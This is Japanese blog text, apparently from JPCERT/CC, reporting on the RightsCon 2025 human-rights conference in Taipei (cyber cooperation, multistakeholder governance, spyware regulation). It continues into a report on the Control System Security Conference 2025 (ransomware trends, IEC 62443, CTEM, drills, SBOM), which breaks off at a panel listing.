こんにちは、国際部の米澤です。2025年2月24日から27日にかけて、台北市で開催された国際会議「RightsCon 2025<a href="#01">[1]</a>」に参加してきましたので、会議の概要と現地の様子について紹介します。 <h3>RightsConとは</h3> RightsConは、デジタル時代の人権をテーマとする世界有数の国際会議です。米国の非営利団体Access Nowが主催しており、これまで、サンノゼ、チュニス、トロント、ブリュッセル、リオデジャネイロ、マニラ、サンフランシスコなど、世界各地で開催されてきました。会議には、市民社会組織や政府関係者、ジャーナリスト、ビジネスリーダー、研究者、技術者などが参加し、多様な視点から自由でオープン、かつ安全なデジタル世界を実現するための議論を行っています。スポンサーには、カナダやオランダなどの政府や、Meta、Google、Microsoftなどの大手テック企業、APNIC、TWNICなどのインターネット資源管理団体など、30の組織が名を連ねていました。 今回、台北での開催は13回目にして東アジア地域初となりました。台湾デジタル発展省の発表によれば、155カ国・地域から、およそ3,200人が参加したそうです<a href="#02">[2]</a>。正確な参加者の数や属性などは、今後RightsConの公式サイトで公開されると思います。 <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-3694866 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/Rightscon1-450wri.jpg" alt="" width="450" height="338"><figcaption>会場エントランス</figcaption> </figure> プログラムのテーマには、その年ごとの社会的な関心事項や課題が反映されています。今年は、「AIと新興技術」「ガバナンス・政治・選挙」「インターネットアクセスと包摂性」「コンテンツガバナンス」「オンラインヘイトと暴力」など、18のテーマがありました。セッション数は約550件あり、会場・オンライン・ハイブリッドのいずれかの形式で、最大で22のセッションが同時進行していました。すべてを聴講することはできないため、関心のあるテーマの中から取捨選択する必要があります。 また、人権というテーマを扱う会議であるため、会場ではセキュリティやプライバシー保護に細心の注意が払われていました。会場の至るところに警備スタッフが配置されていたほか、写真・動画撮影は原則禁止で、撮影可能な1階のエリアでも、撮影禁止を意味する赤ストラップのパスを身につけた参加者が映らないよう注意が促されていました。会場には多くの参加者がいて、熱気に包まれていたのですが、その様子を写真でお伝えできないことが残念です。 <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-3694867 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/Rightscon2-450wri.jpg" alt="" width="450" height="338"><figcaption>参加パスに貼る国旗シール</figcaption> </figure> 今回参加するにあたり、私自身はサイバーセキュリティ、グローバルガバナンス、能力構築支援、商用スパイウェアの規制などに関するセッションを中心に聴講し、これらの分野の国際的な動向について情報収集をしてきました。その中から、主に３つの議論について紹介します。 <h3>サイバー空間の脅威に対応するための国際協力の重要性</h3> サイバーセキュリティに関しては、国際的な協力や官民連携の重要性について議論されていました。昨今、重要インフラを狙った攻撃や、ランサムウェア攻撃などのサイバーセキュリティ上の脅威がいずれの国においても高まっており、対策の強化が喫緊の課題となっています。各国・地域に共通するサイバー攻撃の脅威もあり、それぞれが持ち合わせている情報を共有し協力して攻撃手口を分析し対策を行うことが、インシデントの減少や、インシデント発生時の迅速な対応につながります。こうした対策強化の取り組みの例として、Quadなどの外交的枠組みでの取り組みや、Locked Shieldsなどの国際的サイバー防衛演習への参加、対策が遅れている地域での長期的な能力構築支援の実施、政策立案や脅威情報の分析における官民連携の強化などが取り上げられていました。インド太平洋地域における能力構築支援に関するセッションでは、それぞれの地域の状況やニーズを現地に行って把握し、信頼関係を構築しつつ長期的に支援していくことが重要であるとの声もありました。 <h3>マルチステークホルダーアプローチの危機</h3> 多様な利害関係者同士が協力して課題解決に取り組むマルチステークホルダーのアプローチが難しい状況に置かれているという問題提起もありました。インターネットガバナンスにおいて、政府・民間企業・市民社会・技術者など多様な人々が協力するマルチステークホルダーモデルは、民主的でオープンなインターネットを維持する上で重要な仕組みです。例えば、AIなどの新興技術の開発と規制に関しては、技術の進歩が早く議論が追い付いていないことが課題となっており、この問題に対応するには技術コミュニティーも含めた協力が不可欠だとする声がありました。 しかし、このマルチステークホルダーモデルが脅かされています。その理由として、今回聴講したセッションでは、権威主義体制の拡大や、資金不足、言語の壁や知識の格差などが、参加の障壁として挙げられていました。そして、これらの障壁により、市民社会や民間企業の参加が制限され、対話の機会が失われていくのではないかと、多くの人が危機感を示していました。マルチステークホルダーの意義は、技術的な政策協議のためのリソースや専門知識を提供すること、また政策決定によって影響を受ける人々のニーズや課題について理解を深めてもらうことにあり、今後も市民社会が継続的に議論に参加していくために資金確保などの課題に取り組む必要性が訴えられていました。 <h3>商用スパイウェア規制の国際的な動向</h3> 安全保障を目的として政府に販売されている商用スパイウェアの規制は、RightsConで毎年取り上げられているテーマの一つです。スパイウェアを用いた監視技術はテロ防止などの安全保障に貢献するという主張がある一方、ジャーナリストや活動家などの人権やプライバシーの侵害にも使用されていることが、カナダの研究機関CitizenLabの調査やメディアの報道などから明らかになっています。スパイウェアを規制するための議論において、その正当な利用と濫用をどのように線引きするかが大きな課題です。規制を巡っては、これまでにいくつかの国際的な動きがありました。米国ではバイデン政権が連邦政府における商用スパイウェアの使用を制限する大統領令を発出しました<a href="#03">[3]</a>。欧州連合（EU）はPEGA委員会を立ち上げ、国際人権法等に基づいたスパイウェアの使用について調査を実施し、規制強化に向けた提言を発表しています<a href="#04">[4]</a>。また、英仏は国際イニシアチブ「ポール・モール・プロセス<a href="#05">[5]</a>」の発足を主導し、国際的な協力に基づいた規制強化の取り組みを進めようとしています。この取り組みには、日本を含む27の国や機関、14の民間企業、12の市民団体および研究機関が参加を表明しました。今後、これらの取り組みによる具体的な規制の策定や、実効性の検証などが進むことが期待されます。このほかにも、スパイウェアによる被害者の法的救済や心理的ケアなど、多くの課題について議論されていました。 <h3>おわりに</h3> RightsConでは、人とつながり、対話をする時間がとても大切にされていると感じました。会場ではMeetupイベントが開催されていたり、スピーカーと聴衆の質疑応答の時間もしっかりと確保されていたりと、参加者同士が交流し、自由に意見を交わす機会が多く提供されていました。今すぐ解決できる問題は少ないですが、声を上げ、問題を知り、対話を重ね、アイデアを持ち寄り、できることから取り組んでいくことが、いずれ物事を変えていく大きな力になり得ることを感じました。また、国際規範や各国の政策に関する議論から、研究機関や民間企業の取り組み、個人のジャーナリストの活動まで、幅広い現場での声を聞くことができる貴重な場でもあると感じました。JPCERT/CCの主な業務はインシデント対応支援や国内外のCSIRTコミュニティーとの情報連携などですが、サイバー攻撃による被害を防ぐための日々の活動は、サイバー空間における人権を守る活動の一部であることを改めて認識しました。RightsConで議論されていたさまざまなサイバーセキュリティを巡る課題に、自分たちの特性を活かしてどのように向き合い、課題解決に貢献していけるのかを今後も考えていきたいと思います。 <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-3694868 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/Rightscon3-450wri.jpg" alt="" width="450" height="338"><figcaption>会場は台北のランドマーク「台北101」のすぐ隣でした</figcaption> </figure> 国際部米澤詩歩乃 <h2>参考情報</h2> <a name="01">[1]</a> RightsCon <a href="https://www.rightscon.org/">https://www.rightscon.org/</a> <a name="02">[2]</a> MODA: RightsCon 2025 Successfully Concludes in Taipei, Marking a Milestone for Taiwan's Digital Diplomacy and Global AI Engagement <a href="https://moda.gov.tw/en/press/press-releases/15448">https://moda.gov.tw/en/press/press-releases/15448</a> <a name="03">[3]</a> Executive Order on Prohibition on Use by the United States Government of Commercial Spyware that Poses Risks to National Security <a href="https://bidenwhitehouse.archives.gov/briefing-room/presidential-actions/2023/03/27/executive-order-on-prohibition-on-use-by-the-united-states-government-of-commercial-spyware-that-poses-risks-to-national-security/">https://bidenwhitehouse.archives.gov/briefing-room/presidential-actions/2023/03/27/executive-order-on-prohibition-on-use-by-the-united-states-government-of-commercial-spyware-that-poses-risks-to-national-security/</a> <a name="04">[4]</a> PEGA Committee final report <a href="https://www.rcmediafreedom.eu/Resources/Reports-and-papers/PEGA-Committee-final-report">https://www.rcmediafreedom.eu/Resources/Reports-and-papers/PEGA-Committee-final-report</a> <a name="05">[5]</a> The Pall Mall Process tackling the proliferation and irresponsible use of commercial cyber intrusion capabilities <a href="https://www.gov.uk/government/publications/the-pall-mall-process-declaration-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities/the-pall-mall-process-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities">https://www.gov.uk/government/publications/the-pall-mall-process-declaration-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities/the-pall-mall-process-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities</a>
制御システムセキュリティカンファレンス2025 開催レポート

Mon, 24 Mar 2025 05:00:00 -0000

JPCERT/CCは、2025年2月5日に制御システムセキュリティカンファレンス...

JPCERT/CCは、2025年2月5日に<a href="https://www.jpcert.or.jp/event/ics-conference2025.html" target="_blank" rel="noopener">制御システムセキュリティカンファレンス2025</a>を開催いたしました。本カンファレンスは、国内外の制御システムにおける脅威の現状や制御システムセキュリティのステークホルダーによる取り組みを共有し、参加者の制御システムセキュリティ対策の向上やベストプラクティス確立の一助となることを目的に開催しています。2009年以来、毎年開催し、今年で17回目を迎えました。 今回は、ハイブリッド（会場＋オンライン配信）の会議形態で実施し、会場50名、オンラインでは511名（参加申込数約500名、参加見込み500名規模、最大同時視聴者250名程度）の方々に参加をいただきました。JPCERT/CC Eyesでの開催レポートとして、開会・閉会のごあいさつおよび7つの講演の様子を紹介いたします。 <h3>開会ごあいさつ</h3> 経済産業省商務情報政策局サイバーセキュリティ課長武尾伸隆 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_00_MINISTRY_OF_ECONOMY_TRADE_AND_INDUSTRY.pdf" target="_blank" rel="noopener">講演資料</a> 経済産業省商務情報政策局サイバーセキュリティ課長の武尾氏より開会のごあいさつをいただきました。 近年のサイバー攻撃の現状において、ランサムウェア攻撃やサプライチェーンの脆弱性を突いた攻撃が増加しており、特に中小企業がターゲットにされていることが深刻な問題として浮き彫りになっています。これらの攻撃手法は進化を続けており、特にAI技術や地政学的リスクの影響を受け、今後さらに高度化・複雑化が懸念されると警鐘を鳴らされました。 また、国際的には、セキュア・バイ・デザインの概念が浸透しつつある中、企業は自社製品のセキュリティ対策にも責任を持つ必要があり、特にIoT機器に対しては各国でセキュリティ基準への対応が求められるようになっていることを紹介されました。 こうした状況を踏まえて、経済産業省では、企業のサイバーセキュリティ対策の強化を図る取り組みを実施しています。各種セキュリティ対策ガイドラインの公表や中小企業向けの支援、サプライチェーン企業のセキュリティ対策レベルの可視化の仕組みの検討、IoT製品のセキュリティ認証制度の構築、SBOMの活用促進など、企業のサイバーセキュリティ対策の強化を図る取り組みを紹介されました。 さらに、セキュリティ人材の育成プログラムについて、企業から派遣された人材を対象に、１年間の集中的なトレーニングを実施し、専門の技能と人脈を習得してもらうことに重点を置いていると紹介されました。 結論として、サイバー攻撃の危険性は年々高まっており、特に中小企業がさらされているリスクが大きいことから、国家全体での対策強化が必要であり、政府と民間の連携を深めることで、より安全な社会を構築することが求められていると締めくくりました。 <img class="asset asset-image at-xid-3640588 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_01-640wri.png" alt="経済産業省商務情報政策局サイバーセキュリティ課長武尾伸隆氏" width="640" height="330"> <h3>制御システム・セキュリティの現在と展望～この1年間を振り返って～</h3> 講演者： 一般社団法人JPCERTコーディネーションセンター技術顧問宮地利雄 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_01_JPCERTCC.pdf" target="_blank" rel="noopener">講演資料</a> <a href="https://youtu.be/F07q95FhKNc" target="_blank" rel="noopener">YouTube</a> 本講演では、2025年版の制御システム（ICS）セキュリティに関する状況を振り返り、主な動向や変化について解説しました。 最初にセキュリティ概況について、地政学的な緊張が高まる中で、サイバー犯罪もますます高度化していることを指摘しました。また、ウクライナ戦争や米中貿易戦争などがサプライチェーンにも影響しており、サプライチェーンを狙ったサイバー攻撃も増えています。こうした状況に対応するため、企業はリスク管理の強化をいっそう求められていることにも言及しました。 ICSインシデントの動向としては、ランサムウェアの攻撃が依然として衰えておらず、攻撃を受けた組織の2/3が製造業であり、また攻撃を受けた組織の約半数で操業あるいは製品の出荷停止となる状況について説明しました。このように、ランサムウェア被害は件数が拡大傾向にあるが、特に米国やドイツなどの地域からの報告が大多数を占めていることを指摘し、最近のICSインシデントの報道の多くが米国証券取引委員会への報告をベースにしていて技術的な内容に乏しいが、2022年重要インフラ・サイバーインシデント報告法で義務付けられたCISAへの報告が2年後に始まるので状況の改善が期待されると述べました。 ランサムウェアは特にICSを狙って攻撃しているわけではありませんが、一定の割合でランサムウェア攻撃の影響がICSにも及んでいて、製造業界でも被害が続いており、一部の攻撃グループに対して法執行機関が国際的な取り締まりを進めましたが、新しい攻撃集団が登場するなど、全体としての攻撃活動は高止まりしていることに言及しました。 ICSを狙ったマルウェアとしてDragos社が発見したFrostyGoopとClaroty社が報告したIOcontrolが新たに登場したことを紹介しました。また、ICSのエンジニアリング環境が感染したマルウェアを調査したところ、開発者や開発された目的は不明ながら、ICS向けの機能を搭載したものが複数見つかったとの報告があり、これを契機に同様のマルウェアのより広範な調査が進む可能性があると述べました。 ICSのコンポーネントやIoTデバイスの脆弱性の開示状況については、CISAが発行したアドバイザリ件数の経年変化を見ると、ほぼ一定数を維持した直前の3年間に比べて2024年には約1割の増加を見ました。一部ベンダーでは脆弱性を一掃すべくローラー調査を進めていますが、共通ライブラリなどから継承する脆弱性も多く、新たに発見されるICS関連の脆弱性が枯れてくるようになる見通しは立っていないと指摘しました。 法規制と標準を整備する活動に目を転ずるとまた、欧州が進めているNIS-2指令（改正ネットワークおよび情報システム指令）を国内法化する期限を過ぎましたが、予定よりも遅れている国が少なくありません。サイバー・レジリエンス法も発効しましたが、細目の規定などが固まるまで、さらに注目しておく必要がありそうです。標準については分冊2-1の改訂や分冊1-1の改訂草案が出るなど、IEC 62443シリーズが新段階に入りつつあることを紹介しました。 次のセクションでは、新技術に伴う新しいICSセキュリティの課題を紹介しました。2024年に大きな変容を遂げた生成AIを中心としたAI技術はICSの世界でも関心が高まっており、AI技術を利用することに伴う脆弱性を中心にセキュリティ課題の概念的な整理を試みました。また、量子コンピューティングが2035年前後に実用的な水準に至り、一部の暗号アルゴリズムが危殆化するとの予測があります。ICSの製品寿命の長さを考慮すると、暗号アルゴリズムを量子コンピューティング時代にも危殆化しないものに移行する戦略を持つ必要性を指摘しました。 最後に、ICSセキュリティに関して2024年を比較的平穏な1年間だったと位置付けつつも、地政学的な状況など潜在的なリスクは決して低下しておらず、また、新技術の導入に伴う新たなセキュリティリスクも浮上していることを指摘して、この1年間のICSセキュリティの動向を総括しました。 <img class="asset asset-image at-xid-3640590 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_02-640wri.png" alt="一般社団法人JPCERTコーディネーションセンター技術顧問宮地利雄" width="640" height="330"> <h2> </h2> <h3>IEC 62443制御システムセキュリティ規格の現状</h3> 講演者： デロイトトーマツサイバー合同会社 サイバーアドバイザリー／スペシャリストマスター市川幸宏 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_02_DELOITTE_TOHMATSU_CYBER.pdf" target="_blank" rel="noopener">講演資料</a> 市川氏の講演では、近年、制御システムへのサイバー攻撃が急増しており、特に製造業においてはランサムウェア攻撃が深刻な脅威となっており、このような状況に対抗するために、多様な法規制や国際標準が策定され、それに基づく取り組みが進められていることが紹介されました。特に、IEC 62443制御システムセキュリティ規格の現状、特にIEC 62443-2-1 Edition 2.0の概要、そして今後の動向について考察された内容などについて詳しく解説されました。 サイバーセキュリティ脅威の現状として、ENISA（欧州ネットワーク情報セキュリティ機関）によると、2023年から2024年の間に発生したサイバーセキュリティインシデントが11,079件に上り、その中でもランサムウェア攻撃は特に注目されていて製造業が被害組織全体の17%を占め、また、ランサムウェア攻撃の中ではLockbitが特に高い割合（42.65%）を占めています。この脅威の増加に対応するため、IEC 62443のような国際標準が整備され、求められているサイバーセキュリティ対策の枠組みと、組織が効果的にセキュリティを管理するための指針を提供していると述べました。 IEC 62443は、複数の分冊からなる工業自動化および制御システム（IACS）に関するサイバーセキュリティのための国際標準であり、従来、４つのファミリーが存在しました。-1は文書全体の定義に関した内容、-2は制御システムオーナー（工場やプラントの維持・管理をするもの）に関した内容、-2／-3はシステムインテグレーター（オーナーや次の製品供給者と協力しシステムを構築するもの）に関した内容、-4は製品供給者に関した内容でした。近年４つのファミリーから６つのファミリーに拡大し、-5 制御システム以外の分野別対応に関する内容や、-6 第三者認証などの適合性評価の基準が追加されたことを述べました。 IEC 62443-2-1 Edition 2.0は、2010年に発行された初版を約14年ぶりに改訂したもので、ISO/IEC 27000シリーズ標準をはじめとする主要な標準との整合性を重視しており、この新たな版では、アセットオーナーが組織的に実践すべきプロセス要件が具体的に示され、セキュリティ対策を8つの要素に分類し、さらに16のサブカテゴリーに分けて詳細に述べていると紹介しました。また、IEC 62443シリーズの他の分冊とも共通する、プロセス成熟度モデル（Maturity Level 1～4）が新たに採用され、アセットオーナーが自らのセキュリティ対策の成熟度を評価するための指針を提供していると紹介しました。 IEC 62443シリーズの今後の展望については、IoTや認証に関連する適合性評価の導入を検討されていて、より効果的なサイバーセキュリティ対策が可能になり、また、他の国際標準や法規との関係性をより明確にすることで、各業界におけるセキュリティ要件の整合性が図られるようになるとの期待を表明しました。 最後に、サイバーセキュリティの脅威が進化する中、IEC 62443のような国際的な標準は極めて重要で、特に、IEC 62443-2-1 Edition 2.0による新しいガイドラインは、アセットオーナーに対する組織的なセキュリティの理解を深める助けとなり、今後もこのような基準が進化し、業界が直面する脅威に対して強化された対応策が講じられることが期待されていると述べました。そして、サイバーセキュリティはもはや一部の専門家の問題ではなく、すべての企業が共通して取り組むべき課題であると言えるので、制御システムセキュリティに対する理解を深め、より安全な未来を実現していく必要があると締めくくりました。 <img class="asset asset-image at-xid-3640591 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_03-640wri.png" alt="デロイトトーマツサイバー合同会社サイバーアドバイザリー／スペシャリストマスター　市川幸宏氏" width="640" height="324">   <h3>サイバーセキュリティを考慮したプロセス安全マネジメントフレームワーク</h3> 講演者： 合同会社ストラトジックPSM研究会代表社員／横浜国立大学 IMS客員教授田邊雅幸 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_03_STRATEGIC_PSM.pdf" target="_blank" rel="noopener">講演資料</a> 田邊氏には、ストラトジックPSM研究会が進めている、リスクベースのプロセス安全マネージメントシステムと、サイバーセキュリティを考慮したリスクアセスメントを実施した取り組みの結果について情報を共有いただくために講演をお願いしました。 最初に、田邊氏が中心となって進めているストラトジックPSM研究会について説明がありました。ストラトジックPSM研究会は、横浜国立大学先端科学高等研究院を母体にしたリスクベースのPSM（Process Safety Management）の効果的導入手法の研究会として2020年に活動を開始し、2023年に法人化されました。2024年にサイバーセキュリティとPSMの統合について議論され、その成果が今回の講演のベースとなります。 ストラトジックPSMのPSMは、リスクベースのアプローチで行われ、さらに、IEC61508/61511に定められているライフサイクルマネージメントとCCPSの20のエレメントモデルの考え方が加味されていると紹介しました。 PSMのサイバーセキュリティへの適用においても、ライフサイクルマネージメントやCCPSの20エレメントといった手法が用いられ、それらの手法をもとにサイバーセキュリティのリスクプロファイルを把握することにより、サイバーセキュリティとリスクベースのPSMとの統合を試みており、講演の中で成果を共有されました。 サイバーセキュリティのリスクアセスメントは、ベースとなる文献を参考に、1）対象の決定および基本情報の収集、2）CS-PHA実施、3）CS-HAZOP実施、4）CS-LOPA実施、 5）セキュリティレベル（SL）および機能要求決定、6）ネットワーク構成評価および対策の決定、の流れで行ったとの説明があり、そしてそれぞれについてその手法とサンプルシステムに対する評価結果を共有されました。 最後に、リスクアセスメントの結果をどのように組織として管理していくべきかという組織体制について説明がありました。特にサイバーセキュリティを考慮したプロセス安全管理の体制においては、プロセス安全（PS）、労働安全衛生（OHS）、環境安全（ENV）そしてサイバーセキュリティ（CS）の各分野の専門家をメンバーとするチームを編成することと、そのチームが機能するためにも重要なポイントとしてIT-OT間の通訳ができる人材育成が存在することが必要であると締めくくりました。 <img class="asset asset-image at-xid-3646914 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_04_1-640wri.png" alt="合同会社ストラトジックPSM研究会代表社員／横浜国立大学 IMS客員教授　田邊雅幸氏" width="640" height="325"> <h3>制御システムにおけるCTEMを活用したリスク低減策</h3> 講演者： Claroty Ltd. APJ Sales／Solution Engineer 加藤俊介 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_04_CLAROTY.pdf" target="_blank" rel="noopener">講演資料</a> 加藤氏の講演では、近年話題となっているCTEM（Continuous Threat Exposure Management、継続的エクスポージャー管理）を制御系システムに応用したケースについて詳しく解説されました。 まず、セキュリティ対策の全般の課題として、ICSをターゲットとした攻撃はインパクトが大きく、事業インパクトを見据えた多層的な対策の必要性を指摘した上で、次に、継続的エクスポージャー管理（CTEM）について説明がありました。CTEMはガートナーによって提唱された概念であり、組織がサイバーリスクを継続的に管理し、セキュリティを改善するための反復的なプロセスであって、全体的なリスクを管理するために事業インパクトとしての評価を重視した、継続的、動的な運用方法であると紹介しました。 次に、CTEMの制御システムへの応用について、フェーズ1のスコープ設定からフェーズ5の実践に至る各ステップにおいて、制御システムにおける固有の状況も考慮した上で、CTEMの適用のポイントについて説明しました。 まずフェーズ1のスコープ設定については、想定事業被害ベースでの範囲設定をするなどの例について説明がありました。次にフェーズ2の発見においてはフェーズ1で範囲設定した資産情報について、資産情報、接続性、運用といったそれぞれの観点で収集が必要な旨の説明がありました。次にフェーズ3の優先付けではデバイス種類＋公開脆弱性＋データフロー（通信状況）といった状態ベースのアプローチや、リスク値を定量化したリスク値ベースの優先順位付けについてそれぞれそのポイントの説明がありました。フェーズ4の検証では本当に攻撃が可能かどうかを検証するのですが、ICSにおいては可用性への影響懸念から机上ベースでのネットワークパケットや設定ファイルなどのエビデンスベースでの検証が現実的という話がありました。フェーズ5の実践では、エンドポイント、ネットワークベース、PLCコーディングの技術対策例やレポーティングや対策実施時のステークホルダーの巻き込みには事業インパクトから訴えることが重要という説明がありました。 最後にまとめとして、CTEM活用が制御システムセキュリティの継続的な改善のために活用可能な点として、その継続性、システム全体を見る包括性、事業、ビジネスインパクトから考える合理性を挙げました。 <img class="asset asset-image at-xid-3640594 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_05-640wri.png" alt="Claroty Ltd. APJ Sales／Solution Engineer　加藤俊介氏" width="640" height="330"> <h3>トークセッション：『工場のインシデント対応訓練シナリオ』の実践から学ぶ - 制御系SIRTを含む組織内関係者が取り組むべき実務的な訓練とは -</h3> 講演者： JFEスチール株式会社西日本製鉄所倉敷制御部（兼務） サイバーセキュリティ統括部／主任部員荒木一匡 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_05_JFE_STEEL.pdf" target="_blank" rel="noopener">講演資料</a> 一般社団法人JPCERTコーディネーションセンター　 国内コーディネーショングループ制御システムセキュリティシニアアナリスト河野一之 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_05_JPCERTCC.pdf" target="_blank" rel="noopener">講演資料</a> 本講演は、会場開催であることを活かして、トークセッションを交えて実施されました。 まず、JFEスチールの荒木氏から、同社におけるこれまでの制御システムセキュリティに関する取り組み（体制構築、OTセキュリティのインシデント対応規定の策定、 OTセキュリティの技術的な対策等）が紹介されました。同社では近年、インシデント対応訓練を通じたOTセキュリティのインシデント対応規定の組織内の浸透に取り組んでいます。そのような中で、JPCERT/CC主催のICSセキュリティ担当者コミュニティーが本年度に取り組んでいる工場を対象としたインシデント対応訓練シナリオ（前回の「制御システムセキュリティカンファレンス 2024」で同コミュニティーメンバーが発表）の活用に関心を持たれ、本取り組みに他の7組織とともに参加されました。その中で本年度に同社が取り組んだインシデント対応訓練の様子等が紹介されました。同社では、本年度のインシデント対応訓練を全事業所で実施し、「制御系SIRT（いわゆるFSIRT等）」をはじめ、制御部門等、延べ800名を超える関係者が参加されたことも紹介されました。 その後、8組織での実施結果の取りまとめと評価を行ったJPCERT/CCから、評価結果の中から良かった点と課題に焦点を絞り込んで紹介しました。良い点では、セキュリティ事故における連絡網が事前に整備されていること、工場も含めたインシデント対応マニュアルが整備されつつあること、組織内で有事の際の情報集約の体制が整備されて来ていること等を紹介しました。課題としては、連絡内容が不明瞭であること、証拠保全と事業継続の並行対応を見据えたリソース確保等の事前準備が不十分であること、万一生産を停止した場合の再開判断の決定要素に曖昧さがあること等を挙げました。 以上の発表の後のトークセッションでは、次のようなテーマで荒木氏にインタビューを行い、回答をいただきました。質疑応答は次のとおりでした。 ● 特に今回の訓練に盛り込んだ3つの要素「訓練の意義」「日常的な実施」「対外連携」についてどのように感じられましたか？ <ul> <li>訓練にも「体験型」等がありますが、今回は参加者に被害を最小化するための「決まった連絡等の初動対応が当たり前にできるようになる」成熟と浸透の機会として取り組みました。</li> <li>防災等の訓練のように日常的に取り組み、身体に染み込ませて、いざとなった時に混乱せず対応できるようになるために定期的に実施する必要があると感じており、本シナリオやコミュニティー参加により、自社の「制御系SIRT」が訓練を企画する準備の負荷が下がり「日常的に取り組める」可能性が高まりました。</li> <li>これまで「訓練」は自組織内の完結型であることが多かったのですが、上述のコミュニティーに参加したことで、「訓練」においても「対外連携」の要素（JPCERT/CCへの情報連携等）を入れ込むことの重要性を感じました。</li> </ul> ●「訓練」に「制御系SIRT」等の組織内関係者を参加させる有益性についてどのようにお考えでしょうか？ <ul> <li style="box-sizing: border-box;">制御部門の中でインシデント対応や制御系セキュリティの推進を担う「制御系SIRT」は企画者として、制御システムオーナー部門は現場運用者として参加しました。同オーナー部門にとっては、多種多様な設備があり、運用プロセス等も多様であるため、同オーナー部門自身でリスクの把握と有事で何をすべきかを考え整理してもらう必要があること等の参加意義があります。</li> </ul> ● 準備と実践で、ITとOTの違いはありましたか？ <ul> <li>制御系の経験から多々違いがあると感じています。特に、有事の際は、フォレンジックや復旧等はIT以上に現場対応が多くなること、安全の確保や環境影響等も踏まえた対処が必要となり、それらも想定した訓練準備が必要だと考えました。</li> </ul> この訓練の取り組みとその中での「制御系SIRT」や組織内関係者の参加状況とその役割、訓練で得られる気付き等について、カンファレンス参加者の関心を強く呼び起こしたようで、上記のテーマ以外にも多くの質問が寄せられました。 <img class="asset asset-image at-xid-3640596 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_06-640wri.png" alt="JFEスチール株式会社西日本製鉄所倉敷制御部（兼務）サイバーセキュリティ統括部／主任部員　荒木一匡氏、 JPCERT/CC 国内コーディネーショングループ制御システムセキュリティシニアアナリスト　河野一之" width="640" height="330"> <h3>SBOMに備えよ！基幹インフラ事業者が直面したツラいSBOM運用とその対策  </h3> 講演者： NTTコミュニケーションズ株式会社 イノベーションセンターテクノロジー部門西野卓也 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_06_NTT_COMMUNICATIONS.pdf" target="_blank" rel="noopener">講演資料</a> 西野氏の講演では、SBOMの重要性が認識されるようになった要因やその概念と利用目的、その運用と対策が紹介されました。 SBOMの重要性が認識される一因となった、SolarWinds社製品のアップデート機能を利用したサイバー攻撃について説明し、食品の成分表示のように、利用するソフトウェア製品に組み込まれているコンポーネントを可視化するSBOMが求められるようになったことを紹介しました。また、最近のSBOMの利用目的として、「サプライチェーンにおけるセキュリティ」の確保とともに、「ライセンス管理」や「脆弱性管理」「ポリシーおよびコンプライアンス管理」などを挙げました。また、薬機法や米国の大統領令等、日本を含む各国の法的な対応においてもSBOMの提供を義務付けていることを紹介しました。中でも、最近注目されている欧州のCRA（Cyber Resilience Act）において、自己適合宣言を行うには実質的にSBOMを活用する可能性があります。 このようにさまざまな点でSBOMの必要性がうたわれるものの、企業内における運用実績は乏しく、まだまだ手探り状態にあること、さらには、1．SBOMのフォーマットに関する問題、2．SBOM生成のツールに関する問題、3．SBOMの同一性に関する問題、4．SBOMの生成手法に関する問題、5．セキュリティ対応に関する問題、6．セキュリティ管理に関する問題の6つの運用上の課題があることを詳細に説明しました。また、最終的に誰がどのような目的（自組織で利用しているソフトウェアにおけるOSSの把握等）でSBOMを利用するのかを想定して、ソフトウェアの開発段階からステークホルダー間で合意を取り、その目的を想定したSBOMを生成しやすいようにソフトウェアを開発しなければ適切なSBOMが生成できないことを強調しました。 こうした適切なSBOMが生成できた場合は、自組織内のOSS等における脆弱性を横断的に把握できる等のメリットがあるものの、SBOMを管理する際にどういった条件下で生成されたSBOMなのかの情報もセットで管理しなければならないとの管理上の留意点にも言及しました。さらには、SBOMを活用した脆弱性管理としては、SBOMとSSVCを活用することで製造業におけるアプライアンス管理を同社で取り組んでいることを例に、脆弱性の検知と優先度の判断を機械的かつ現実的に対応できることを紹介しました。 <img class="asset asset-image at-xid-3646916 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_07_1-640wri.png" alt="NTTコミュニケーションズ株式会社イノベーションセンターテクノロジー部門　西野卓也氏" width="640" height="328"> <h3>パネルセッション：脆弱性対応のための適切な資産管理手法へのチャレンジ</h3> 講演&パネラー： パナソニックオートモーティブシステムズ株式会社 開発本部プラットフォーム開発センターセキュリティ開発部係長越智直紀 日本精工株式会社デジタル変革本部 ITガバナンス部担当課長田中哲也 ファシリテーター： 